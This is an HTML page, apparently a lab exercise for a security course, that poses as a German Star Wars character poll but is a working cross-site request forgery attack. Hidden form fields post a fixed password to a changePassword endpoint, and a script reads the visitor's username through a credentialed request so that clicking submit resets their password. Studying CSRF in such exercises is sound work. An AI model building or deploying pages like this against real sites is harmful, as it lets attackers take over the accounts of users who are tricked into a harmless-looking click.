<html>

<head>
    <link href="style.css" rel="stylesheet" type="text/css">
</head>

<body>
    <div>
        <h2>Wer ist dein Lieblings Star Wars Charakter?</h2>
        <form action="https://m183.gibz-informatik.ch/api/csrf/changePassword" method="POST">
            <input type="hidden" name="username" value="">
            <input type="hidden" name="password" value="Pa$$w0rd">
            <select>
                <option>Jar Jar Binks</option>
                <option>Boba Fett</option>
                <option>Java der Hutte</option>
                <option>Luke Skywalker</option>
                <option>Anakin Skywalker</option>
                <option>Leia organa</option>
                <option>Tobi-Wan Kenobi</option>
                <option>Han Solo</option>
                <option>Yoda</option>
                <option>Chewbacca</option>
                <option>R2-D2</option>
                <option>Darth Maul</option>
            </select>
            <input type="submit" value="Einreichen" />
        </form>
    </div>
    <script>
        const req = new XMLHttpRequest();
        let user = document.querySelector("input[name='username']");
        req.open("GET", "https://m183.gibz-informatik.ch/api/csrf/getUsername");
        req.withCredentials = true;
        req.setRequestHeader("Content-Type", "application/json, text/plain, */*");
        req.onreadystatechange = function (e) {
            if (this.readyState === 4) {
                username = req.responseText;
                user.setAttribute("value", username);
            }
        }
        req.send();
    </script>
</body>

</html>